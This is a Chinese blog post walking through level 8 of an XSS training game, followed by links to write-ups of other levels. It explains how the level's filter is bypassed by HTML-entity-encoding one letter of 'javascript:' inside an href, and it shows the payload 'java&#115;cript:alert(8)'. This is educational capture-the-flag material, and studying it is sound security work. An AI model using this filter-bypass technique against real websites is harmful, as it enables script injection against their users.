AI 助理
备案控制台
开发者社区 云计算 文章 正文

XSS-Game level 8

2021-12-30 121
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 第八关过滤的很严 , 只能编码绕过了

第八关过滤的很严 , 只能编码绕过了

image.png

源码中过滤了大小写,替换了script , on 事件 和 一些属性 , 而后将参数拼接到 href 属性

image.png我们使用编码绕过 s 编码后为 s , payload

javascript:alert(8)
<a href="'.$str7.'">    //拼接前
<a href="java&#115;cript:alert(8)">    //拼接后
<a href="javascript:alert(8)">    //编码后

点击友情链接 , 触发弹窗 , 过关

image.png

士别三日wyx
目录
相关文章
科技小能手
|
Apache 安全
apache 禁止trace或track防止xss攻击
科技小能手
2035 0
士别三日wyx
|
JavaScript 前端开发
XSS-Game Level1
第一关算是送分题 , 没有任何过滤 , 传递一个弹窗的JS脚本即可
士别三日wyx
202 0
XSS-Game Level1
士别三日wyx
|
JavaScript
XSS-Game Level 2
第二关将结果拼接到了value属性中 , 我们插入JS脚本时手动闭合双引号即可
士别三日wyx
114 0
XSS-Game Level 2
士别三日wyx
XSS-Game level 10
第十关过滤了尖括号 > < , 并且隐藏了输入框 , 使用事件绕过,并使输入框取消隐藏
士别三日wyx
77 0
XSS-Game level 10
士别三日wyx
XSS-Game level 12
第十二关利用 HTTP_USER_AGENT 通过点击事件绕过
士别三日wyx
131 0
XSS-Game level 12
士别三日wyx
XSS-Game level 7
第七关过滤了 script , 但未过滤尖括号 '<','>' , 使用双写绕过
士别三日wyx
122 0
XSS-Game level 7
士别三日wyx
XSS-Game Level 4
第四关过滤了左右尖括号 ">","<" , 我们使用事件来绕过
士别三日wyx
127 0
XSS-Game Level 4
士别三日wyx
XSS-Game level 11
第十一关通过 Referer , 利用事件绕过
士别三日wyx
109 0
XSS-Game level 11
士别三日wyx
XSS-Game level 6
第六关未过滤大小写 , 使用大小写绕过
士别三日wyx
101 0
XSS-Game level 6
士别三日wyx
XSS-Game level 5
第五关过滤了 <script> 和 on 事件 , 使用 a 标签绕过
士别三日wyx
119 0
XSS-Game level 5